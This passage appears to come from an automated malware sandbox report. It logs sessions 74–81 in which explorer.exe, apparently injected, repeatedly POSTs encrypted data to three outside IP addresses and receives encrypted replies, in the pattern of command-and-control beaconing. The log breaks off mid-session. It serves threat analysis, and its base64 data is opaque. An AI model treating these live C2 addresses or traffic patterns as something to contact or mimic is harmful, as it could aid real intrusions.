C/9kOo4t1cOlZHehdrISauhe8sDcptznKFJQZRXCGyxEtoAtq/sk1t3ZMHWscEZpwj3Bm8Yr/Ux3N/t2M3HUOlEROgQwhomw39cTMUG6B3QQ0qomnGC32ol6dTD47iIqj4bmJ9v6VOnBSJ+cm0eYv3NoOJcfv//jrgCsra4dw6qXKqb/sTdrlPPHpu4DhFJwSCaceWpIyVh3249xMW8wZ5Q68UFFErpmOrCqgPtVwnvwjv6IKqW0N1mFDCHJ1o7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50803	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:03 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:03 UTC	1122	OUT	Data Raw: 59 69 33 30 4e 41 52 70 4e 36 30 2f 78 58 59 61 50 30 78 32 71 52 6c 48 2b 4b 70 4e 71 59 71 2f 64 33 53 66 63 4a 45 43 58 39 44 45 7a 71 55 75 6a 71 4f 4c 36 57 62 76 68 68 62 2f 77 32 68 48 33 67 56 58 41 6b 79 44 71 56 38 7a 2f 50 45 31 75 57 66 48 59 79 58 54 30 4e 58 72 56 69 61 30 5a 71 36 50 44 49 55 5a 49 78 43 6f 65 48 36 31 75 48 6f 57 33 6a 46 36 6a 4a 35 58 4c 62 2b 73 63 75 71 4d 6c 63 52 6d 4f 58 43 52 34 66 6b 48 4b 62 78 66 6b 2f 6e 48 6b 4b 45 33 6b 70 71 38 4d 64 5a 4f 73 4c 55 7a 39 47 31 37 54 55 35 7a 6e 75 74 66 2f 44 69 54 66 45 30 53 74 7a 4d 74 2f 44 56 45 5a 6e 4d 57 62 76 57 39 6f 77 72 49 44 31 62 57 6a 34 36 41 74 65 58 44 34 50 70 62 76 54 46 32 67 35 76 58 31 71 72 53 50 73 6a 31 2f 35 63 38 65 2f 34 64 36 66 5a 77 79 4e 47 Data Ascii: Yi30NARpN60/xXYaP0x2qRlH+KpNqYq/d3SfcJECX9DEzqUujqOL6Wbvhhb/w2hH3gVXAkyDqV8z/PE1uWfHYyXT0NXrVia0Zq6PDIUZIxCoeH61uHoW3jF6jJ5XLb+scuqMlcRmOXCR4fkHKbxfk/nHkKE3kpq8MdZOsLUz9G17TU5znutf/DiTfE0StzMt/DVEZnMWbvW9owrID1bWj46AteXD4PpbvTF2g5vX1qrSPsj1/5c8e/4d6fZwyNG
2024-07-27 06:56:04 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:04 UTC	685	IN	Data Raw: 55 6b 69 6d 48 36 67 55 56 38 2f 38 4c 4c 64 65 2f 32 6a 49 79 77 47 56 37 6e 34 38 51 54 48 36 39 57 74 6e 39 73 64 4e 45 77 54 31 32 70 33 73 73 30 30 30 4b 42 78 42 43 48 6c 45 59 47 6d 31 77 44 78 39 55 67 58 6c 31 43 4d 77 4b 7a 38 31 79 7a 56 34 52 36 34 4d 50 4b 4f 39 6d 52 7a 53 51 62 45 4e 30 6d 48 42 6a 54 31 4b 51 73 70 6f 55 41 2b 30 31 2b 64 63 2f 56 38 73 42 6b 66 4d 70 74 64 53 78 74 57 65 4b 6a 66 68 53 73 58 34 51 30 37 32 58 67 59 56 74 4d 79 4c 64 35 32 53 46 34 2f 32 78 71 38 64 58 57 62 74 70 63 41 33 79 36 6b 38 69 78 46 6a 72 4e 67 7a 6a 39 6a 71 76 37 31 51 77 37 59 6c 38 4b 55 7a 6d 53 62 4a 4d 58 69 47 59 49 62 5a 46 43 56 45 2b 58 78 4c 2f 30 31 2b 50 52 35 39 61 6d 74 36 67 79 45 35 51 50 4f 73 59 48 49 55 66 4c 69 42 31 68 4e Data Ascii: UkimH6gUV8/8LLde/2jIywGV7n48QTH69Wtn9sdNEwT12p3ss000KBxBCHlEYGm1wDx9UgXl1CMwKz81yzV4R64MPKO9mRzSQbEN0mHBjT1KQspoUA+01+dc/V8sBkfMptdSxtWeKjfhSsX4Q072XgYVtMyLd52SF4/2xq8dXWbtpcA3y6k8ixFjrNgzj9jqv71Qw7Yl8KUzmSbJMXiGYIbZFCVE+XxL/01+PR59amt6gyE5QPOsYHIUfLiB1hN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50805	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:05 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:05 UTC	1122	OUT	Data Raw: 41 37 36 43 4c 58 31 45 72 38 77 6c 32 47 75 4b 72 5a 38 47 35 2b 73 69 4e 7a 37 30 41 5a 77 44 45 37 61 6f 76 55 44 51 47 32 62 36 32 4c 34 44 57 43 6b 63 79 34 65 6e 72 44 37 37 4c 41 7a 47 6b 53 64 67 36 30 63 62 68 74 79 6a 73 61 54 44 38 52 42 51 4c 4f 57 42 49 42 39 35 50 69 6c 4a 45 37 7a 4b 45 4e 63 63 4d 44 58 55 7a 76 4b 58 2f 71 6c 62 6c 73 33 6e 6d 6b 53 33 41 55 68 58 6a 30 57 57 53 4c 69 78 36 67 68 43 31 41 6a 75 6c 4a 2b 58 76 6e 36 6a 4c 32 58 47 62 4b 4b 67 4b 48 61 52 2f 68 6a 31 6c 49 70 39 43 34 50 77 51 57 36 7a 73 2f 41 5a 72 65 7a 31 69 6a 62 42 33 2b 74 33 47 51 72 38 61 6a 56 77 54 2b 61 72 77 51 57 57 6f 5a 76 67 55 38 65 78 67 62 59 4a 50 70 4a 47 31 38 2b 45 63 39 44 42 54 53 38 41 6e 79 4b 48 79 48 36 48 53 4f 30 72 4f 57 78 Data Ascii: A76CLX1Er8wl2GuKrZ8G5+siNz70AZwDE7aovUDQG2b62L4DWCkcy4enrD77LAzGkSdg60cbhtyjsaTD8RBQLOWBIB95PilJE7zKENccMDXUzvKX/qlbls3nmkS3AUhXj0WWSLix6ghC1AjulJ+Xvn6jL2XGbKKgKHaR/hj1lIp9C4PwQW6zs/AZrez1ijbB3+t3GQr8ajVwT+arwQWWoZvgU8exgbYJPpJG18+Ec9DBTS8AnyKHyH6HSO0rOWx
2024-07-27 06:56:06 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:06 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:06 UTC	685	IN	Data Raw: 5a 4f 5a 53 65 6d 6b 65 43 66 34 6f 37 50 43 74 57 65 36 67 59 47 65 32 6e 57 50 70 47 4a 74 41 72 77 57 65 38 49 6a 4c 6d 71 58 6e 52 67 58 75 67 49 47 5a 35 39 32 56 47 6a 66 50 50 34 47 6b 76 37 73 33 6b 34 76 4d 77 59 6e 31 65 34 2b 41 78 34 4d 71 4e 6b 48 73 57 64 35 49 41 78 50 47 6f 49 75 65 6e 54 6e 36 45 38 45 45 44 51 2b 63 58 58 59 62 67 54 68 2b 75 57 6e 47 69 36 57 30 6e 70 4b 79 38 74 43 52 51 45 4a 58 36 4d 75 33 76 69 61 41 54 55 4e 31 2b 59 52 43 54 2f 67 2b 38 44 67 36 49 72 56 47 30 67 6b 54 61 38 36 69 69 6c 57 67 79 74 75 4c 6d 78 6a 43 43 71 6a 44 54 79 48 33 6a 6c 70 72 6a 50 32 70 4f 47 36 55 34 34 62 67 57 7a 37 30 58 62 76 59 4f 75 52 32 39 4b 41 59 78 71 6c 50 38 51 37 74 67 30 78 4b 61 36 35 6a 51 45 63 43 4a 63 45 61 57 50 37 Data Ascii: ZOZSemkeCf4o7PCtWe6gYGe2nWPpGJtArwWe8IjLmqXnRgXugIGZ592VGjfPP4Gkv7s3k4vMwYn1e4+Ax4MqNkHsWd5IAxPGoIuenTn6E8EEDQ+cXXYbgTh+uWnGi6W0npKy8tCRQEJX6Mu3viaATUN1+YRCT/g+8Dg6IrVG0gkTa86iilWgytuLmxjCCqjDTyH3jlprjP2pOG6U44bgWz70XbvYOuR29KAYxqlP8Q7tg0xKa65jQEcCJcEaWP7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50806	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:07 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:07 UTC	1122	OUT	Data Raw: 4e 49 49 73 76 4b 70 75 64 7a 49 77 4e 30 77 6f 56 6f 45 71 42 39 64 50 75 32 6e 77 6a 63 67 6f 35 64 6c 46 45 62 4d 75 73 6a 6c 63 41 69 37 64 67 58 6c 66 4a 56 6d 49 33 41 73 67 45 56 49 4f 70 4d 57 39 72 73 50 41 53 75 6e 41 6b 46 51 52 66 74 59 53 46 6d 33 69 5a 50 66 67 50 50 72 4f 62 51 79 45 69 49 66 65 2f 38 75 49 79 4d 33 4e 6c 76 4c 61 6b 66 75 70 39 67 77 70 56 73 7a 62 30 75 79 62 58 50 30 44 58 35 77 38 70 6c 56 46 4a 4f 75 67 34 35 56 31 48 42 42 4d 6a 65 41 73 67 42 4f 66 6b 67 31 35 68 74 72 61 38 71 6a 46 6e 77 76 49 33 42 4f 59 70 37 65 45 48 6e 43 47 54 47 74 35 69 48 4b 48 74 79 6a 39 6e 6f 46 56 33 61 49 7a 5a 6c 6a 37 41 65 66 69 57 67 79 54 6f 4a 78 55 52 79 30 78 52 33 74 6b 36 61 38 35 68 52 38 4c 41 6e 75 56 43 65 39 51 36 64 61 Data Ascii: NIIsvKpudzIwN0woVoEqB9dPu2nwjcgo5dlFEbMusjlcAi7dgXlfJVmI3AsgEVIOpMW9rsPASunAkFQRftYSFm3iZPfgPPrObQyEiIfe/8uIyM3NlvLakfup9gwpVszb0uybXP0DX5w8plVFJOug45V1HBBMjeAsgBOfkg15htra8qjFnwvI3BOYp7eEHnCGTGt5iHKHtyj9noFV3aIzZlj7AefiWgyToJxURy0xR3tk6a85hR8LAnuVCe9Q6da
2024-07-27 06:56:09 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:09 UTC	685	IN	Data Raw: 4d 42 6b 7a 45 35 4f 55 70 65 44 53 67 37 39 78 65 2b 49 41 6b 59 43 75 36 67 4a 54 68 74 47 34 2b 57 33 2f 38 35 77 55 32 55 52 47 49 64 64 43 32 39 6e 41 5a 52 6a 5a 32 75 62 67 4b 34 51 4f 6e 61 63 4e 77 71 71 32 32 42 70 76 51 70 65 4d 53 6c 30 45 35 76 6b 63 55 6b 69 6b 37 2f 6a 4c 68 4c 65 62 45 76 2f 4d 6a 4f 78 7a 32 61 45 75 6d 6e 4c 46 6c 4c 72 54 5a 44 73 48 32 49 32 46 79 47 34 68 31 52 67 35 31 66 64 48 6b 37 61 65 4e 74 6a 70 2b 52 54 49 57 75 36 32 77 61 78 58 48 75 74 64 69 71 70 42 45 37 63 64 4e 68 4c 33 34 57 32 57 34 36 2b 39 5a 34 45 6a 48 33 51 4c 6b 38 79 70 6d 4f 6b 45 2f 6d 4f 33 46 6c 71 74 73 2b 6b 51 74 43 38 76 7a 6f 44 53 71 51 2f 4d 4c 35 6a 63 47 76 58 50 6c 62 79 2b 52 67 30 34 66 54 6a 46 66 6d 56 78 32 67 6e 62 6d 62 69 Data Ascii: MBkzE5OUpeDSg79xe+IAkYCu6gJThtG4+W3/85wU2URGIddC29nAZRjZ2ubgK4QOnacNwqq22BpvQpeMSl0E5vkcUkik7/jLhLebEv/MjOxz2aEumnLFlLrTZDsH2I2FyG4h1Rg51fdHk7aeNtjp+RTIWu62waxXHutdiqpBE7cdNhL34W2W46+9Z4EjH3QLk8ypmOkE/mO3Flqts+kQtC8vzoDSqQ/ML5jcGvXPlby+Rg04fTjFfmVx2gnbmbi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50807	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:09 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:09 UTC	1122	OUT	Data Raw: 61 65 4c 2b 63 44 6c 51 31 78 77 34 6f 37 31 4c 54 61 66 45 34 71 63 76 41 59 57 76 69 6e 61 64 70 6a 43 6c 54 44 49 78 51 35 62 4d 75 30 59 74 70 4f 47 76 69 33 56 41 6c 71 42 4c 6b 53 42 73 57 6d 49 79 58 43 78 4c 44 4e 74 59 6d 57 50 42 45 57 71 64 48 7a 30 6f 30 52 4a 64 41 45 73 66 76 78 71 71 4a 69 43 41 75 6f 65 49 36 65 34 7a 6b 4b 35 71 78 6f 4f 74 71 6b 38 4b 77 4b 59 50 45 53 4c 4f 72 59 31 70 49 54 57 76 69 70 75 71 32 57 6a 4b 6d 47 68 6b 34 47 4f 34 50 6f 54 2f 56 73 34 75 44 4b 43 63 55 55 64 67 79 66 78 55 62 74 4b 37 7a 4f 74 54 56 46 69 41 50 72 71 45 66 55 35 56 54 4e 39 4d 36 36 6b 50 6f 37 4e 61 54 65 41 4a 6b 74 6f 46 30 71 78 49 54 6f 48 76 67 34 51 61 6f 74 65 55 72 65 78 46 53 30 2b 47 70 30 6b 58 57 52 35 56 4b 4a 6d 35 56 78 4d Data Ascii: aeL+cDlQ1xw4o71LTafE4qcvAYWvinadpjClTDIxQ5bMu0YtpOGvi3VAlqBLkSBsWmIyXCxLDNtYmWPBEWqdHz0o0RJdAEsfvxqqJiCAuoeI6e4zkK5qxoOtqk8KwKYPESLOrY1pITWvipuq2WjKmGhk4GO4PoT/Vs4uDKCcUUdgyfxUbtK7zOtTVFiAPrqEfU5VTN9M66kPo7NaTeAJktoF0qxIToHvg4QaoteUrexFS0+Gp0kXWR5VKJm5VxM
2024-07-27 06:56:10 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:10 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:10 UTC	685	IN	Data Raw: 4d 6a 73 69 4c 6a 44 74 7a 76 37 34 4d 44 4c 4f 6f 6e 75 36 69 43 71 4b 76 45 4c 30 70 5a 6f 34 70 54 51 78 42 31 38 52 5a 72 2b 43 4f 47 6a 62 74 47 31 70 65 30 34 31 5a 35 74 34 45 63 30 67 34 33 4d 65 31 6a 58 42 67 67 74 57 74 62 78 77 2f 6a 4c 7a 76 65 36 4c 61 73 50 52 70 70 41 70 32 73 37 34 41 70 55 76 49 75 43 78 57 4b 61 57 53 76 62 61 69 68 4d 36 45 57 62 35 38 54 6b 65 4b 4f 30 4c 7a 30 46 74 52 5a 32 32 2b 6b 30 78 6c 38 78 34 6a 33 62 54 73 77 46 57 68 76 66 76 42 64 32 75 43 74 63 36 55 55 74 61 45 73 39 4f 4e 36 44 30 78 77 30 62 70 61 4a 72 6d 51 6f 6e 46 41 46 64 44 6e 6f 6f 61 35 58 45 4b 56 63 79 4b 62 75 79 55 59 38 66 4a 32 70 45 57 4d 59 6a 51 45 56 2f 44 2b 2f 6c 6d 4f 6e 61 50 6d 4f 58 76 6c 62 43 50 42 6e 76 68 37 41 46 54 37 77 Data Ascii: MjsiLjDtzv74MDLOonu6iCqKvEL0pZo4pTQxB18RZr+COGjbtG1pe041Z5t4Ec0g43Me1jXBggtWtbxw/jLzve6LasPRppAp2s74ApUvIuCxWKaWSvbaihM6EWb58TkeKO0Lz0FtRZ22+k0xl8x4j3bTswFWhvfvBd2uCtc6UUtaEs9ON6D0xw0bpaJrmQonFAFdDnooa5XEKVcyKbuyUY8fJ2pEWMYjQEV/D+/lmOnaPmOXvlbCPBnvh7AFT7w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50808	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:11 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:11 UTC	1122	OUT	Data Raw: 50 6d 57 49 31 36 58 4e 69 58 4b 30 32 49 4c 36 44 76 75 34 59 74 37 59 66 65 79 2f 57 6b 47 6f 69 79 35 34 54 2f 4d 74 79 32 7a 6f 76 4d 6e 42 64 31 75 45 53 79 6a 76 4f 6f 62 68 38 43 31 6c 30 35 44 78 66 62 73 56 36 70 4b 31 56 32 35 43 77 42 4b 7a 57 78 68 30 79 76 53 38 71 39 48 79 37 58 7a 42 6b 61 4b 4d 33 2b 39 79 62 56 4c 74 2b 46 6f 4b 52 45 63 6c 52 6f 56 6e 6c 4d 70 6f 6c 30 6a 68 55 62 63 54 65 48 2f 41 72 69 44 4c 6c 6a 4b 71 44 51 64 45 52 4d 51 4c 33 57 30 56 43 54 58 65 30 61 39 38 6a 55 47 69 51 49 6a 44 4a 71 46 38 2b 42 51 30 49 64 4a 4f 34 4a 53 59 50 51 6d 46 73 78 35 31 38 43 72 7a 4a 44 39 69 67 67 37 52 45 7a 48 4e 54 46 65 69 4a 66 4a 44 46 47 50 34 71 57 39 34 4e 4f 49 47 6a 4b 33 50 49 4b 48 66 47 37 31 6b 48 47 31 44 77 4c 39 Data Ascii: PmWI16XNiXK02IL6Dvu4Yt7Yfey/WkGoiy54T/Mty2zovMnBd1uESyjvOobh8C1l05DxfbsV6pK1V25CwBKzWxh0yvS8q9Hy7XzBkaKM3+9ybVLt+FoKREclRoVnlMpol0jhUbcTeH/AriDLljKqDQdERMQL3W0VCTXe0a98jUGiQIjDJqF8+BQ0IdJO4JSYPQmFsx518CrzJD9igg7REzHNTFeiJfJDFGP4qW94NOIGjK3PIKHfG71kHG1DwL9
2024-07-27 06:56:12 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:12 UTC	685	IN	Data Raw: 63 73 59 45 62 71 42 34 42 56 49 55 61 41 71 5a 32 74 45 44 46 2f 68 36 45 45 76 6f 4d 65 6f 49 39 32 52 67 79 37 42 41 6b 56 2b 72 4f 6b 74 37 32 46 44 54 74 56 6b 55 37 48 6f 64 7a 69 4e 73 51 58 73 37 49 73 67 58 79 79 39 58 57 41 62 58 63 34 6b 52 75 67 31 4b 63 30 6f 56 53 72 51 73 49 30 51 65 63 4d 55 41 4b 59 6a 39 77 4b 57 68 35 35 54 6f 54 35 4e 4d 67 58 36 71 75 7a 45 74 38 36 50 4a 38 4b 5a 2f 75 36 45 6f 43 72 69 61 62 4b 30 57 53 4c 2f 72 6f 6b 54 4b 6a 6e 41 47 67 39 79 2f 39 45 6c 31 35 75 2f 73 53 64 69 55 50 45 6b 74 47 6f 62 32 79 35 54 36 30 72 59 57 56 7a 79 32 67 59 51 76 30 2f 37 56 75 66 67 30 48 62 33 56 39 4e 56 63 56 4c 75 4d 4a 4b 44 5a 44 65 6f 56 30 69 46 65 59 41 35 74 52 51 6d 7a 71 55 36 68 6d 68 4d 4a 52 63 6c 62 67 44 69 Data Ascii: csYEbqB4BVIUaAqZ2tEDF/h6EEvoMeoI92Rgy7BAkV+rOkt72FDTtVkU7HodziNsQXs7IsgXyy9XWAbXc4kRug1Kc0oVSrQsI0QecMUAKYj9wKWh55ToT5NMgX6quzEt86PJ8KZ/u6EoCriabK0WSL/rokTKjnAGg9y/9El15u/sSdiUPEktGob2y5T60rYWVzy2gYQv0/7Vufg0Hb3V9NVcVLuMJKDZDeoV0iFeYA5tRQmzqU6hmhMJRclbgDi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50809	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:13 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:13 UTC	1122	OUT	Data Raw: 41 51 73 56 72 4c 62 69 42 65 63 55 77 30 47 72 74 6e 53 77 6c 4e 59 72 53 70 52 69 65 4f 73 69 78 4d 43 68 36 64 43 2f 53 54 34 69 73 33 4b 2f 46 72 4f 54 47 4b 64 63 43 6b 6b 61 51 53 41 49 78 31 6d 67 74 53 75 6d 32 2f 46 52 44 61 4a 67 53 79 6d 43 68 68 4b 65 65 77 61 38 34 55 49 52 75 4e 53 55 34 51 65 62 44 74 37 44 38 6d 49 44 41 6b 72 65 76 63 67 47 33 55 52 49 6b 62 5a 73 65 4c 6c 51 6b 6d 4c 48 78 59 47 52 2f 33 6e 35 6d 34 34 39 50 7a 4f 64 71 48 36 35 36 4c 7a 55 67 32 47 47 74 74 48 54 6b 77 75 4c 64 44 42 79 31 2b 43 64 6b 79 31 53 76 58 41 43 4f 4a 4e 58 56 55 34 6a 76 67 5a 59 63 44 44 57 49 35 51 47 57 68 42 47 54 57 67 62 75 6f 47 76 37 6f 63 6c 68 54 58 57 31 51 34 71 68 31 67 62 31 78 30 45 67 4f 62 4f 41 4e 57 6c 59 7a 6c 43 2b 4b 4a Data Ascii: AQsVrLbiBecUw0GrtnSwlNYrSpRieOsixMCh6dC/ST4is3K/FrOTGKdcCkkaQSAIx1mgtSum2/FRDaJgSymChhKeewa84UIRuNSU4QebDt7D8mIDAkrevcgG3URIkbZseLlQkmLHxYGR/3n5m449PzOdqH656LzUg2GGttHTkwuLdDBy1+Cdky1SvXACOJNXVU4jvgZYcDDWI5QGWhBGTWgbuoGv7oclhTXW1Q4qh1gb1x0EgObOANWlYzlC+KJ
2024-07-27 06:56:15 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:15 UTC	685	IN	Data Raw: 4c 50 71 78 66 4c 4b 52 6d 59 62 4b 4f 67 30 4b 44 6f 46 50 6f 52 75 4d 33 73 68 2b 62 75 2b 2f 4e 7a 41 50 63 74 56 36 49 34 7a 30 70 75 33 33 49 46 6a 52 70 62 55 67 59 70 74 4f 42 2f 2f 32 55 66 62 52 33 44 76 57 54 46 4f 64 6e 4e 77 68 68 43 65 53 58 67 4e 55 68 54 51 6f 70 70 37 71 68 31 72 33 30 49 55 61 50 79 53 32 51 6e 39 49 6f 62 5a 68 56 64 67 6a 30 48 75 2f 48 49 58 61 59 6f 6e 37 35 69 30 35 45 66 64 78 55 31 63 53 74 6e 57 31 66 44 66 4f 42 43 57 54 68 69 61 44 51 43 6a 33 57 33 4b 37 31 74 47 67 44 44 6d 4a 61 51 78 57 43 72 57 76 4e 75 68 67 53 38 58 4c 6f 4b 53 57 7a 4e 31 31 41 2b 78 56 6b 67 47 32 5a 70 2b 59 68 75 36 44 39 64 48 59 41 71 6f 65 65 4a 4e 33 53 37 5a 58 58 32 50 5a 44 45 74 38 6a 6b 4a 68 45 48 4e 5a 56 57 72 42 4a 2b 6a Data Ascii: LPqxfLKRmYbKOg0KDoFPoRuM3sh+bu+/NzAPctV6I4z0pu33IFjRpbUgYptOB//2UfbR3DvWTFOdnNwhhCeSXgNUhTQopp7qh1r30IUaPyS2Qn9IobZhVdgj0Hu/HIXaYon75i05EfdxU1cStnW1fDfOBCWThiaDQCj3W3K71tGgDDmJaQxWCrWvNuhgS8XLoKSWzN11A+xVkgG2Zp+Yhu6D9dHYAqoeeJN3S7ZXX2PZDEt8jkJhEHNZVWrBJ+j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50810	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:15 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:15 UTC	1122	OUT	Data Raw: 69 6f 71 36 48 36 2b 58 52 33 54 36 58 49 35 4f 6f 34 46 47 34 52 2b 6c 62 72 72 70 73 4e 47 6a 49 38 57 32 6a 4c 43 35 7a 64 30 45 32 56 46 49 77 73 31 52 33 7a 77 6e 71 68 57 59 37 55 41 43 4a 65 50 4a 69 52 59 57 64 50 36 4e 30 2f 78 65 7a 50 30 2f 42 50 4d 7a 37 4f 4c 39 6a 34 56 50 58 43 4d 6c 41 55 35 62 35 6f 41 39 35 37 75 6e 2b 47 51 32 33 49 4a 6d 38 58 57 77 42 75 64 55 51 56 77 32 72 58 30 31 46 6e 61 79 53 39 77 77 70 50 69 4d 75 43 61 70 31 79 34 69 78 54 36 37 6e 68 63 4b 44 48 50 75 6a 69 64 70 79 71 67 6b 76 31 4c 37 6f 46 72 35 66 67 45 48 6e 51 50 67 48 4d 33 38 31 37 65 48 46 57 44 75 76 43 6f 6c 39 54 43 46 63 69 75 6d 4c 36 79 67 44 32 50 64 73 32 46 38 54 43 43 37 52 43 32 46 46 30 67 74 57 56 4d 6f 62 6e 52 44 46 77 71 68 7a 38 66 Data Ascii: ioq6H6+XR3T6XI5Oo4FG4R+lbrrpsNGjI8W2jLC5zd0E2VFIws1R3zwnqhWY7UACJePJiRYWdP6N0/xezP0/BPMz7OL9j4VPXCMlAU5b5oA957un+GQ23IJm8XWwBudUQVw2rX01FnayS9wwpPiMuCap1y4ixT67nhcKDHPujidpyqgkv1L7oFr5fgEHnQPgHM3817eHFWDuvCol9TCFciumL6ygD2Pds2F8TCC7RC2FF0gtWVMobnRDFwqhz8f
2024-07-27 06:56:16 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:16 UTC	685	IN	Data Raw: 69 50 53 2f 53 73 6f 68 61 32 6f 6c 44 70 45 4f 50 32 37 39 70 30 30 4a 4d 43 4f 59 33 42 79 7a 37 79 4c 46 76 47 6c 64 6a 65 62 62 6b 54 4b 75 77 44 7a 30 34 6e 7a 39 63 71 4b 44 51 45 7a 4d 61 5a 43 65 4f 66 4d 5a 49 43 47 30 38 62 54 6d 4b 54 39 4e 35 36 34 63 75 36 44 51 72 4c 61 35 4d 65 44 2f 34 57 66 77 46 42 38 6e 2b 52 65 31 70 32 47 59 73 37 54 50 53 75 48 46 41 5a 68 2b 69 76 55 70 4b 6f 51 32 6c 65 47 34 45 46 69 32 56 4d 69 69 7a 79 37 35 78 63 69 54 42 31 54 43 2f 78 50 46 6d 68 75 4f 74 72 6d 4b 57 73 4e 62 71 79 44 47 59 51 4e 4b 34 46 36 50 53 56 6a 61 67 7a 39 2f 6f 47 53 45 38 35 36 34 72 62 4b 68 6c 6a 67 41 55 54 41 6a 30 53 58 54 43 69 70 6c 70 44 46 2f 4f 6b 7a 59 48 68 52 4e 68 4d 63 31 55 49 46 65 76 52 6c 70 70 43 74 6e 34 4a 69 Data Ascii: iPS/Ssoha2olDpEOP279p00JMCOY3Byz7yLFvGldjebbkTKuwDz04nz9cqKDQEzMaZCeOfMZICG08bTmKT9N564cu6DQrLa5MeD/4WfwFB8n+Re1p2GYs7TPSuHFAZh+ivUpKoQ2leG4EFi2VMiizy75xciTB1TC/xPFmhuOtrmKWsNbqyDGYQNK4F6PSVjagz9/oGSE8564rbKhljgAUTAj0SXTCiplpDF/OkzYHhRNhMc1UIFevRlppCtn4Ji

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50811	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:17 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
